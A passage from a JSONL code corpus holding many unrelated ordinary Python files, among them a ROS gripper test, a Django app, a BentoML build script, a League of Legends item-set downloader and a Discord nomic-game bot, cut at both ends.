min_pulse=cfg.THROTTLE_REVERSE_PWM)\n\n # add threaded part for gps controller\n V.add(gps, outputs=[\"currLocation\", \"prevLocation\"], threaded=True)\n\n # add planner, actuator parts\n V.add(planner, inputs=[\"currLocation\", \"prevLocation\"], outputs=[\"steer_cmd\", \"throttle_cmd\"])\n V.add(steering, inputs=['steer_cmd'])\n V.add(throttle, inputs=['throttle_cmd'])\n\n V.start()\n\n\nif __name__ == '__main__':\n # goalLocation is a list of lists: each sublist a waypoint for the controller.\n goalLocation = [[32.8811271,-117.2342783], [32.8812414, -117.2374792]]\n\n cfg = dk.load_config() \n drive(cfg, goalLocation)\n","sub_path":"gps_manage.py","file_name":"gps_manage.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"9392327","text":"# coding=UTF-8\nimport pathlib\nimport ffmpeg\n\n\ndef main(): \n root_path = pathlib.Path('.')\n root_files = [x.name for x in root_path.iterdir() if x.is_file()]\n\n for dir in root_path.iterdir():\n if dir.is_file():\n continue\n\n input_file_list = pathlib.Path(dir / 'VIDEO_TS/').glob('VTS_01_*.VOB')\n\n for input_file in input_file_list:\n if input_file.name == 'VTS_01_0.VOB':\n continue\n\n file_num = input_file.name.replace('VTS_01_', '-').replace('.VOB', ' ')\n output_file_name = dir.name.replace('ビデオ 家族の記録 ', '').replace(' ', file_num) + '.mp4'\n\n if output_file_name in root_files:\n print('pass')\n continue\n\n stream = ffmpeg.input(input_file)\n stream = ffmpeg.output(stream, output_file_name)\n\n ffmpeg.run(stream)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ffmpeg-converter.py","file_name":"ffmpeg-converter.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"17778420","text":"# Given an integer 0>n<=25, calculate the corresponding nth Fibonacci number\n\n# a = F(n-2)\n# b = F(n-1)\n# c = F(n)\n\nGIVEN_NUMBER = 23\n\na = 0\nb = 1\nc = 1\n\nfor i in range(1, GIVEN_NUMBER):\n c = a + b\n a = b\n b = c\n\nprint(c)\n","sub_path":"Rosalind/Fibonacci-Numbers/fibonacci-numbers.py","file_name":"fibonacci-numbers.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"251755409","text":"from __future__ import annotations\n\nimport argparse\nimport os\nimport typing as t\n\nimport attr\nimport torch\n\nimport bentoml\nfrom bentoml import Bento\nfrom bentoml._internal.bento.build_config import BentoBuildConfig\nfrom bentoml._internal.configuration.containers import BentoMLContainer\nfrom bentoml._internal.utils import resolve_user_filepath\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--tag\", type=str, default=None)\n parser.add_argument(\"--gpu\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n bento_tag = \"triton-integration-onnx\"\n if args.tag:\n bento_tag = f\"triton-integration-onnx:{args.tag}\"\n\n try:\n bentos = bentoml.get(bento_tag)\n print(f\"{bentos} already exists. Skipping...\")\n except bentoml.exceptions.NotFound:\n bentofile = resolve_user_filepath(\"bentofile.yaml\", None)\n\n override_attrs: dict[str, t.Any] = {\n \"python\": {\n \"requirements_txt\": os.path.join(\"requirements\", \"requirements-gpu.txt\")\n if args.gpu and torch.cuda.is_available()\n else os.path.join(\"requirements\", \"requirements.txt\")\n }\n }\n with open(bentofile, \"r\", encoding=\"utf-8\") as f:\n build_config = attr.evolve(BentoBuildConfig.from_yaml(f), **override_attrs)\n\n print(\n \"Saved bento:\",\n Bento.create(build_config, version=args.tag).save(\n BentoMLContainer.bento_store.get()\n ),\n )\n","sub_path":"examples/triton/onnx/build_bento.py","file_name":"build_bento.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"151686079","text":"# -*- coding: utf8 -*-\nfrom __future__ import unicode_literals\n\nimport struct\n\nimport rlp\n\n\ndef test_bytearray():\n e = rlp.encode('abc')\n d = rlp.decode(e)\n d = rlp.decode(bytearray(e))\n\n\ndef test_bytearray_lazy():\n e = rlp.encode('abc')\n d = rlp.decode(e)\n d = rlp.decode_lazy(bytearray(e))\n\n\ndef test_bytearray_encode_decode():\n value = bytearray(b'asdf')\n encoded = rlp.utils.encode_hex(value)\n decoded = rlp.utils.decode_hex(encoded)\n\n assert value == decoded\n\n\ndef test_big_endian_to_int():\n assert rlp.utils.big_endian_to_int(b'\\x00') == 0\n assert rlp.utils.big_endian_to_int(bytearray(b'\\x00')) == 0\n\n value = struct.pack('>Q', 3141516)\n assert rlp.utils.big_endian_to_int(value) == 3141516\n assert rlp.utils.big_endian_to_int(bytearray(value)) == 3141516\n\n\ndef test_encoding_bytearray():\n s = rlp.utils.str_to_bytes('abcdef')\n direct = rlp.encode(s)\n from_bytearray = rlp.encode(bytearray(s))\n assert direct == from_bytearray\n assert rlp.decode(direct) == s\n","sub_path":"tests/test_bytearray.py","file_name":"test_bytearray.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"527632872","text":"def fahr_to_celsius(temp_fahrenheit):\n converted_temp = ( temp_fahrenheit - 32 ) / 1.8\n return converted_temp\ndef temp_classifier(temp_celsius):\n if temp_celsius < -2:\n return 0\n elif temp_celsius < 2:\n return 1\n elif temp_celsius < 15:\n return 2\n else:\n return 3\n\"\"\"\nto combinate these functions to separete classes about temperature level(0,1,2,3)\n\"\"\"","sub_path":"temp_functions.py","file_name":"temp_functions.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"541268369","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n # homepage\r\n path(\"\", views.home, name=\"home\"),\r\n # about\r\n path(\"about/\", views.about, name=\"about\"),\r\n # blog MainPage\r\n path(\"blog/\", views.blog, name=\"blog\"),\r\n # blog detail view\r\n path(\"blog/\", views.blog_detail, name=\"blog_detail\"),\r\n # blogposts by topic\r\n # path(\"blog/topics/\" views.blog_by_topic, name=\"blog_by_topic\"),\r\n # projects\r\n path(\"projects/\", views.projects, name=\"projects\"),\r\n # contact me\r\n path(\"contact/\", views.contact, name=\"contact\"),\r\n # redirect from contact me\r\n path(\"thanks/\", views.thanks, name=\"thanks\"),\r\n]\r\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29617101","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom celery.schedules import crontab\r\nfrom libs.config import get as wordsConfig\r\n\r\nCELERY_RESULT_BACKEND = \"mongodb\"\r\nCELERY_MONGODB_BACKEND_SETTINGS = {\r\n \"host\": wordsConfig(\"mongo.host\"),\r\n \"port\": wordsConfig(\"mongo.port\"),\r\n \"database\": wordsConfig(\"celery.mongo.db\"),\r\n \"taskmeta_collection\": \"stock_taskmeta_collection\",\r\n}\r\n\r\nCELERYBEAT_SCHEDULE = {\r\n 'every-minute': {\r\n 'task': 'tasks.add',\r\n 'schedule': crontab(minute='*/1'),\r\n 'args': (1, 2),\r\n },\r\n}\r\n","sub_path":"libs/db/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"366125886","text":"\n\n# pylint: disable=unused-import\n# pylint: disable=cyclic-import\n\nfrom datetime import datetime\nimport time\n\nimport akit.environment.activate\n\nfrom akit.xlogging.foundations import logging_initialize\n\nfrom akit.integration.landscaping.landscape import Landscape\nfrom akit.mixins.upnpcoordinatorintegration import UpnpCoordinatorIntegration\n\ndef coordinator_example_main():\n\n logging_initialize()\n\n # ==================== Landscape Initialization =====================\n # The first stage of standing up the test landscape is to create and\n # initialize the Landscape object. If more than one thread calls the\n # constructor of the Landscape, object, the other thread will block\n # until the first called has initialized the Landscape and released\n # the gate blocking other callers.\n lscape = Landscape()\n\n # Give the UpnpCoordinatorIntegration an opportunity to register itself, we are\n # doing this in this way to simulate test framework startup.\n UpnpCoordinatorIntegration.attach_to_framework(lscape)\n\n # Finalize the registration process and transition the landscape\n # to the activation phase\n lscape.registration_finalize()\n\n # Give the UpnpCoordinatorIntegration an opportunity to attach to its\n # environment and determine if the resources requested and the\n # resource configuration match\n UpnpCoordinatorIntegration.attach_to_environment()\n\n # Finalize the activation process and transition the landscape\n # to fully active where all APIs are available.\n lscape.activation_finalize()\n\n # Make initial contact with all of the devices\n lscape.first_contact()\n\n s18 = lscape.checkout_a_device_by_modelNumber(\"S18\").upnp\n\n value = s18.getLedState()\n\n if s18.serviceDeviceProperties().subscribe_to_events():\n var_zonename = s18.serviceDeviceProperties().lookup_event_variable(\"ZoneName\")\n znval = var_zonename.wait_for_value(timeout=600)\n print (var_zonename)\n\n isbval = s18.serviceDeviceProperties().lookup_event_variable(\"IsZoneBridge\")\n print (isbval)\n\n value, updated, changed, state = isbval.sync_read()\n\n print (\"value={}, updated={} changed={} state={}\".format(value, updated, changed, state.name))\n print ()\n\n var_zonename = s18.serviceDeviceProperties().lookup_event_variable(\"ZoneName\")\n\n before_change = datetime.now()\n s18.setZoneName(\"Blah\")\n znval = var_zonename.wait_for_update(before_change, timeout=600)\n\n print(\"\")\n print(\"\")\n print(\"Bdee bdee bdee, Thats all folks!\")\n print(\"\")\n print(\"\")\n\n\nif __name__ == \"__main__\":\n coordinator_example_main()\n","sub_path":"examples/upnp_example.py","file_name":"upnp_example.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644214868","text":"class Solution(object):\n def detectCycle(self, head):\n visited = set()\n\n node = head\n while node is not None:\n if node in visited:\n return node\n else:\n visited.add(node)\n node = node.next\n\n return None\n","sub_path":"Python/142. 环形链表 II.py","file_name":"142. 环形链表 II.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651324288","text":"import datetime\nimport calendar\nfrom canteen_modal import Canteen, Stall\nimport db\n\nclass MainWindowController():\n\n def __init__(self,mainUi):\n db.check_DB_exist()\n self.mainUi=mainUi\n self.image_url_prefix='images/'\n self.currentDatetime=self.getCurrentSystemTime()\n self.selectedDateTime=self.currentDatetime\n #self.selectedDateTime=datetime.fromtimestamp(self.currentDatetime.)\n self.canteen=Canteen.all()[0]\n self.all_stalls=[]\n self.getStalls(self.selectedDateTime)\n #self.selectedDateTime=datetime.datetime.fromtimestamp(self.currentDatetime)\n\n def getCurrentSystemTime(self):\n return datetime.datetime.now()\n\n #return Monday to Sunday in integer\n def getDayIdByDateTime(self,datetime):\n #monday is 0, but in database is 1 so plus 1\n return datetime.weekday()+1\n #return datetime in time formate\n def getTimeByDateTime(self,datetime):\n return datetime.strftime('%H:%M:%S')\n #return '09:09:09'\n\n def getStalls(self,datetime):\n self.curr_stalls=Stall.fetchStalls(self.getDayIdByDateTime(datetime),self.getTimeByDateTime(datetime))\n \n def useCurrentDateTime(self):\n self.currentDatetime=self.getCurrentSystemTime()\n self.setSelectTime(self.currentDatetime)\n\n #set select time to newValue and update in UI\n def setSelectTime(self,newValue):\n self.selectedDateTime=newValue\n self.getStalls(self.selectedDateTime)\n self.mainUi.updateDateTimeText(self.selectedDateTime)\n self.mainUi.onSearchTextChange()\n \n #non hala,fast food and halal , but since we only has fast food and other, we just compare 2 condition\n def filterStall(self, text, fastfoodChecked, nonfastFoodChecked):\n filteredStall = [] # reset\n for stall in self.curr_stalls:\n if stall.name.lower().find(text.lower()) != -1:\n if fastfoodChecked:\n if stall.stall_types[0] == 'Fast Food':\n filteredStall.append(stall)\n if nonfastFoodChecked:\n if stall.stall_types[0] != 'Fast Food':\n filteredStall.append(stall)\n\n self.mainUi.displayStall(filteredStall)\n \n \n \n\n \n\n \n \n","sub_path":"mainWindowController.py","file_name":"mainWindowController.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"497037234","text":"\n\nfrom xai.brain.wordbase.verbs._eject import _EJECT\n\n#calss header\nclass _EJECTED(_EJECT, ):\n\tdef __init__(self,): \n\t\t_EJECT.__init__(self)\n\t\tself.name = \"EJECTED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"eject\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_ejected.py","file_name":"_ejected.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"425129438","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/ore/svn/tests/all.py\n# Compiled at: 2008-04-15 01:26:21\nimport unittest, test_Node, test_File, test_Directory, test_Properties, test_Transaction\n\ndef test_suite():\n suite = unittest.TestSuite()\n for mod in [test_Node, test_File, test_Directory, test_Properties, test_Transaction]:\n suite.addTests(mod.test_suite())\n\n return suite\n\n\ndef main():\n runner = unittest.TextTestRunner(verbosity=2)\n result = runner.run(test_suite())\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/ore.svn-1.0.5-py2.5/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260970677","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport time\n\nfrom test_gripper import GripperTester\nfrom ariac_example import ariac_example\nimport rospy\nimport rostest\n\n\nclass GripperBinDropTester(GripperTester):\n\n def test(self):\n self.comp_class = ariac_example.MyCompetitionClass()\n ariac_example.connect_callbacks(self.comp_class)\n time.sleep(1.0)\n\n self._send_arms_to_initial_pose()\n\n self._send_arm1_to_product()\n\n self._enable_gripper(arm=1)\n time.sleep(2.0)\n self.assertTrue(self.comp_class.arm_1_current_gripper_state.enabled)\n self.assertTrue(self.comp_class.arm_1_current_gripper_state.attached)\n\n self._send_arm1_to_tray()\n self.assertTrue(self.comp_class.arm_1_current_gripper_state.enabled)\n self.assertFalse(self.comp_class.arm_1_current_gripper_state.attached)\n\n\nif __name__ == '__main__':\n rospy.init_node('test_gripper_bin_drop', anonymous=True)\n\n # Wait until /clock is being published; this can take an unpredictable\n # amount of time when we're downloading models.\n while rospy.Time.now().to_sec() == 0.0:\n print('Waiting for Gazebo to start...')\n time.sleep(1.0)\n # Take an extra nap, to allow plugins to be loaded\n time.sleep(12.0)\n print('OK, starting test.')\n\n rostest.run('test_ariac', 'test_gripper_bin_drop', GripperBinDropTester, sys.argv)\n","sub_path":"ariac_ws/src/ARIAC/test_ariac/test_gripper_drop_over_bins.py","file_name":"test_gripper_drop_over_bins.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471752020","text":"from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\nclass Migration(migrations.Migration):\n dependencies = [('application', '0001_initial')]\n \n operations = [\n migrations.CreateModel(\n name='Resource',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('content', models.TextField()),\n ('created_by', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","sub_path":"src/application/migrations/0002_resource.py","file_name":"0002_resource.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494251148","text":"from os import path, makedirs\nfrom urllib.request import urlopen as uopen\nfrom json import load, dump\nfrom operator import itemgetter\nfrom shutil import rmtree\n\n\ndef setToItems(block):\n if block:\n items = sorted(block.items(), key=itemgetter(1), reverse=True)\n return [{\"id\": item[0], \"count\": 1} for item in items]\n return []\n\n\ndef mapSkills(block):\n if block:\n return \"\".join([[\"Q\", \"W\", \"E\", \"R\"][int(x) - 1] for x in\n sorted(block.items(), key=itemgetter(1),\n reverse=True)[0][0]])\n return \"No skill info\"\n\n\ndef processSet(champ, pos, sets, champsFolder, groups, wins=False, ver=\"\"):\n sets[\"other\"] = {\"2003\": 10, \"2031\": 9, \"2032\": 8, \"2033\": 7, \"2055\": 6,\n \"2138\": 5, \"2139\": 4, \"2140\": 3, \"3340\": 2, \"3363\": 1,\n \"3364\": 0}\n groups[\"startingitempick\"] = \"Pick: \" + mapSkills(sets.get(\"skillpick\"))\n if wins:\n groups[\"startingitemwin\"] = \"Wins: \" + mapSkills(sets.get(\"skillwin\"))\n blocks = [{\"type\": groups[item], \"items\": setToItems(sets.get(item))}\n for item in groups]\n outputFolder = path.join(champsFolder, champ, \"Recommended\")\n makedirs(outputFolder, exist_ok=True)\n with open(path.join(outputFolder, f\"LoLa_{pos}.json\"), \"w\") as f:\n dump({\"title\": f\"Lolalytics {pos} {ver}\", \"champion\": champ,\n \"map\": \"any\", \"mode\": \"any\", \"sortrank\": 1, \"type\": \"custom\",\n \"blocks\": blocks}, f, separators=(',', ':'))\n\n\ndef updateSets(folder, keep=False, wins=False):\n cFolder = path.join(folder, \"Config\", \"Champions\")\n if not keep:\n if path.exists(cFolder):\n rmtree(cFolder, ignore_errors=True)\n with uopen(\"http://championify.lolalytics.com/data/1.0/ranked.json\") as p:\n page = load(p)\n ver = page[\"version\"]\n groups = {\"startingitempick\": \"\", \"item1pick\": \"First\",\n \"bootspick\": \"Boots\", \"item2pick\": \"Second\",\n \"item3pick\": \"Third\", \"item4pick\": \"Fourth\",\n \"item5pick\": \"Fifth\"}\n if wins:\n groups[\"startingitemwin\"] = \"\"\n groups[\"item1win\"] = \"First\"\n groups[\"bootswin\"] = \"Boots\"\n groups[\"item2win\"] = \"Second\"\n groups[\"item3win\"] = \"Third\"\n groups[\"item4win\"] = \"Fourth\"\n groups[\"item5win\"] = \"Fifth\"\n groups[\"other\"] = \"Other\"\n for c in page[\"stats\"]:\n for p in page[\"stats\"][c]:\n processSet(c, p, page[\"stats\"][c][p], cFolder, groups, wins, ver)\n","sub_path":"lolalytics_sets/lolalytics.py","file_name":"lolalytics.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605530389","text":"import asyncio\nfrom datetime import datetime\n\nfrom discord.ext import commands\nimport discord\n\nfrom constants import colors, emoji\nfrom utils import mutget, mutset, lazy_mutget, make_embed, format_discord_color, member_sort_key\nimport database\nimport nomic.logging\n\n\nVOTE_TYPES = ('for', 'against', 'abstain')\n\nTIME_FORMAT = 'UTC %H:%M:%S on %Y-%m-%d'\n\ngames = {}\n\ndef get_game(ctx):\n return lazy_mutget(games, [ctx.guild.id], lambda: Game(ctx))\n\nclass Game:\n def __init__(self, ctx):\n self.guild = ctx.guild\n self.guilds_database = database.get_db('guilds')\n self.guild_data = mutget(self.guilds_database, [str(self.guild.id)], {})\n\n def save(self):\n self.guilds_database.save()\n\n def _rule_property(key, default_value=None, *,\n getter_func=lambda self, x: x, setter_func=lambda self, x: x):\n def get_val(self):\n return getter_func(self, mutget(self.guild_data, [key], default_value))\n def set_val(self, value):\n mutset(self.guild_data, [key], setter_func(self, value))\n # self.save()\n def del_val(self):\n del self.guild_data[key]\n # self.save()\n return property(get_val, set_val, del_val)\n\n def _add_rule_property(key, *args, **kwargs):\n setattr(Game, key, Game._rule_property(key, *args, **kwargs))\n\n def _try_get_channel(self, channel_id):\n try:\n return self.guild.get_channel(int(channel_id))\n except:\n return None\n\n def get_proposal(self, n):\n proposal = self.proposals.get(str(n))\n if proposal:\n return proposal\n else:\n raise commands.UserInputError(f\"Proposal #{n} does not exist.\")\n\n async def wait_delete_if_illegal(self, *messages):\n if messages and messages[0].channel.id in (self.proposal_channel and self.proposal_channel.id,\n self.transaction_channel and self.transaction_channel.id):\n await asyncio.sleep(5)\n await messages[0].channel.delete_messages(messages)\n\n async def submit_proposal(self, ctx, content):\n self.proposal_count += 1\n m = await self.proposal_channel.send(embed=make_embed(\n color=colors.EMBED_INFO,\n title=f\"Preparing proposal #{self.proposal_count}\\N{HORIZONTAL ELLIPSIS}\"\n ))\n timestamp = datetime.utcnow()\n mutset(self.guild_data, ['proposals', str(self.proposal_count)], {\n 'n': self.proposal_count,\n 'author': ctx.author.id,\n 'content': content,\n 'message': m.id,\n # 'status' can be 'voting', 'passed', or 'failed'\n 'status': 'voting',\n 'votes': {\n 'for': {},\n 'against': {},\n 'abstain': {},\n },\n 'timestamp': timestamp.timestamp(),\n })\n self.save()\n nomic.logging.add_to_proposal_log(self.guild,\n timestamp=timestamp,\n event_name='submit',\n user_id=ctx.author.id,\n proposal_number=self.proposal_count\n )\n await self.refresh_proposal(self.proposal_count)\n\n async def refresh_proposal(self, *proposal_nums):\n \"\"\"Returns a tuple (succeeded, failed), where each element is a list of\n proposal numbers that were either successfully or unsuccessfully\n refreshed.\"\"\"\n succeeded = []\n failed = []\n need_to_save = False\n for proposal_num in proposal_nums:\n # try:\n proposal = self.get_proposal(proposal_num)\n try:\n m = await self.proposal_channel.get_message(int(proposal.get('message')))\n except:\n m = None\n fields = []\n for vote_type in VOTE_TYPES:\n votes = mutget(proposal, ['votes', vote_type])\n vote_lines = []\n total_vote_count = 0\n for user_id in sorted(votes.keys(), key=member_sort_key(self.guild)):\n vote_count = votes.get(user_id)\n if vote_count:\n member = self.guild.get_member(int(user_id))\n if member:\n line = member.mention\n if vote_count != 1:\n line += f\" ({vote_count}x)\"\n vote_lines.append(line)\n total_vote_count += vote_count\n field_name = vote_type.capitalize()\n if total_vote_count:\n field_name += f\" ({total_vote_count})\"\n fields.append((field_name, '\\n'.join(vote_lines) or \"(none)\", True))\n if not (self.allow_abstain_vote and proposal['votes']['abstain']):\n del fields[-1]\n member = self.guild.get_member(proposal.get('author'))\n status = proposal.get('status')\n pass_fail_text = ''\n if status != 'voting':\n pass_fail_text = \" \\N{EM DASH} \"\n pass_fail_text += status.capitalize()\n timestamp = datetime.fromtimestamp(proposal.get('timestamp'))\n embed = make_embed(\n color={\n 'voting': colors.EMBED_INFO,\n 'passed': colors.EMBED_SUCCESS,\n 'failed': colors.EMBED_ERROR,\n }[status],\n title=f\"Proposal #{proposal.get('n')}{pass_fail_text}\",\n description=proposal.get('content'),\n fields=fields,\n footer_text=f\"Submitted at {timestamp.strftime(TIME_FORMAT)} by {member.name}#{member.discriminator}\"\n )\n if m is None:\n m = await self.proposal_channel.send(embed=embed)\n proposal['message'] = m.id\n need_to_save = True\n else:\n await m.edit(embed=embed)\n await m.clear_reactions()\n if status == 'voting':\n await m.add_reaction(emoji.VOTE_FOR)\n await m.add_reaction(emoji.VOTE_AGAINST)\n if self.allow_abstain_vote:\n await m.add_reaction(emoji.VOTE_ABSTAIN)\n succeeded.append(proposal_num)\n # except:\n # failed.append(proposal_num)\n if need_to_save:\n self.save()\n return (succeeded, failed)\n\n async def repost_proposal(self, *proposal_nums):\n try:\n start = min(map(int, proposal_nums))\n if not 1 <= start <= self.proposal_count:\n raise Exception()\n except:\n raise commands.UserInputError(\"Bad proposal numbers(s).\")\n end = self.proposal_count + 1\n for proposal_num in range(start, end):\n proposal = self.get_proposal(proposal_num)\n try:\n await (await self.proposal_channel.get_message(proposal['message'])).delete()\n except:\n pass\n proposal['message'] = None\n await self.refresh_proposal(*range(start, end))\n\n async def remove_proposal(self, user, *proposal_nums, reason='', m=None):\n if m:\n human_proposals = f\"{len(proposal_nums)} proposal{'s' * (len(proposal_nums) != 1)}\"\n title = f\"Removing {human_proposals}\\N{HORIZONTAL ELLIPSIS}\"\n await m.edit(embed=make_embed(\n color=colors.EMBED_INFO,\n title=title,\n description=\"Removing proposals\\N{HORIZONTAL ELLIPSIS}\"\n ))\n number_sequence = list(range(1, self.proposal_count + 1))\n for proposal_num in proposal_nums:\n proposal = self.get_proposal(proposal_num)\n del self.proposals[str(proposal_num)]\n number_sequence.remove(proposal_num)\n nomic.logging.add_to_proposal_log(self.guild,\n event_name='remove_proposal',\n user_id=user.id,\n proposal_number=proposal_num,\n reason=reason,\n )\n try:\n message = await self.proposal_channel.get_message(proposal.get('message'))\n await message.delete()\n except:\n pass\n self.proposal_count = len(number_sequence)\n if number_sequence:\n if m:\n await m.edit(embed=make_embed(\n color=colors.EMBED_INFO,\n title=title,\n description=\"Renumbering remaining proposals\\N{HORIZONTAL ELLIPSIS}\"\n ))\n moved_proposals = []\n for i in range(len(number_sequence)):\n old_num = str(number_sequence[i])\n new_num = str(i + 1)\n if old_num != new_num:\n self.proposals[new_num] = self.proposals[old_num]\n del self.proposals[old_num]\n self.proposals[new_num]['n'] = new_num\n moved_proposals.append(new_num)\n nomic.logging.add_to_proposal_log(self.guild,\n event_name='renumber',\n user_id=user.id,\n proposal_number=old_num,\n new_number=new_num,\n )\n self.save()\n await self.refresh_proposal(*moved_proposals)\n else:\n self.save()\n if m:\n await m.edit(embed=make_embed(\n color=colors.EMBED_SUCCESS,\n title=f\"Removed {human_proposals}\"\n ))\n\n async def vote(self, *, proposal_num, vote_type, user_id, user_agent_id=None, count=1, reason=''):\n \"\"\"Add/change a vote to a proposal.\n\n *\n proposal_num -- Number of the proposal\n vote_type -- One of ('for', 'against', 'abstain', 'remove')\n user_id -- User whose vote is being added/changed\n user_agent_id -- User doing the changing (defaults to same as user)\n count -- Amount of timse to vote (defaults to 1)\n\n You should usually put this in a try-catch.\n \"\"\"\n user_id = str(user_id)\n if count < 1:\n raise commands.UserInputError(\"Invalid vote count.\")\n if count > 1 and not self.allow_multi_vote:\n raise commands.UserInputError(\"Multivoting is not allowed.\")\n if vote_type == 'abstain' and not self.allow_abstain_vote:\n raise commands.UserInputError(\"Abstaining is not allowed.\")\n proposal = self.get_proposal(proposal_num)\n if proposal.get('status') != 'voting':\n raise commands.UserInputError(\"Voting is closed for this proposal.\")\n votes = proposal.get('votes')\n voting_users = set().union(*(votes.get(k).keys() for k in VOTE_TYPES))\n if vote_type == 'remove':\n for k in VOTE_TYPES:\n if user_id in votes.get(k):\n del votes.get(k)[user_id]\n elif vote_type in VOTE_TYPES:\n if user_id in votes.get(vote_type):\n if self.allow_multi_vote:\n votes.get(vote_type)[user_id] += count\n else:\n raise commands.UserInputError(\"Voting multiple times on one proposal is not allowed.\")\n elif user_id in voting_users:\n if self.allow_change_vote:\n for k in VOTE_TYPES:\n kvotes = votes.get(k)\n if user_id in kvotes:\n kvotes[user_id] -= 1\n if kvotes[user_id] == 0:\n del kvotes[user_id]\n else:\n raise commands.UserInputError(\"Changing votes is not allowed.\")\n else:\n votes.get(vote_type)[user_id] = count\n else:\n raise commands.UserInputError(\"Invalid vote type.\")\n self.save()\n nomic.logging.add_to_vote_log(self.guild,\n vote_type=vote_type,\n agent_id=user_agent_id,\n user_id=user_id,\n proposal_number=proposal_num,\n vote_count=count,\n reason=reason,\n )\n await self.refresh_proposal(proposal_num)\n\n async def set_proposal_status(self, user, new_status, *proposal_nums, reason=''):\n succeeded = []\n failed = []\n for proposal_num in proposal_nums:\n try:\n self.get_proposal(proposal_num)['status'] = new_status\n nomic.logging.add_to_proposal_log(self.guild,\n event_name='set_' + new_status,\n user_id=user.id,\n proposal_number=proposal_num,\n reason=reason,\n )\n succeeded.append(proposal_num)\n except:\n failed.append(proposal_num)\n self.save()\n await self.refresh_proposal(*proposal_nums)\n return (succeeded, failed)\n\n def get_currency(self, name):\n name = name.lower()\n if name in self.currencies:\n return self.currencies[name]\n for c in self.currencies.values():\n if name in c['aliases']:\n return c\n return None\n\n def add_currency(self, name, color, aliases=[]):\n for s in [name] + aliases:\n if self.get_currency(s):\n raise commands.UserInputError(f\"The name {s} is already taken by another currency.\")\n self.currencies[name] = {\n 'name': name,\n 'color': format_discord_color(color),\n 'aliases': aliases,\n 'players': {}\n }\n self.save()\n\n def get_transaction(self, n):\n return self.transactions[n - 1]\n\n def format_transaction(self, transaction, include_total=False):\n s = \"**\"\n amt = transaction['amount']\n if amt >= 0:\n s += \"+\"\n s += f\"{amt} {transaction['currency_name']}**\"\n s += \" to \" if amt >= 0 else \" from \"\n s += self.guild.get_member(transaction['user_id']).mention\n if include_total:\n player_amounts = self.currencies[transaction['currency_name']]['players']\n player_total = player_amounts.get(str(transaction['user_id']), 0)\n s += f\" (now {player_total})\"\n if transaction.get('reason'):\n s += f\" {transaction.get('reason')}\"\n return s\n\n async def transact(self, transaction, reason=''):\n amount = transaction['amount']\n currency_name = transaction['currency_name']\n user_id = transaction['user_id']\n user_agent_id = transaction['user_agent_id']\n timestamp = datetime.utcnow()\n currency = self.get_currency(currency_name)\n user_agent = self.guild.get_member(user_agent_id)\n mutget(currency, ['players', str(user_id)], 0)\n currency['players'][str(user_id)] += amount\n m = await self.transaction_channel.send(embed=make_embed(\n color=int(currency.get('color')[1:], 16) or colors.EMBED_INFO,\n description=self.format_transaction(transaction, include_total=True),\n footer_text=f\"Authorized at {timestamp.strftime(TIME_FORMAT)} by {user_agent.name}#{user_agent.discriminator}\"\n ))\n self.transaction_messages.append(m.id)\n self.save()\n nomic.logging.add_to_transaction_log(self.guild,\n timestamp=timestamp,\n 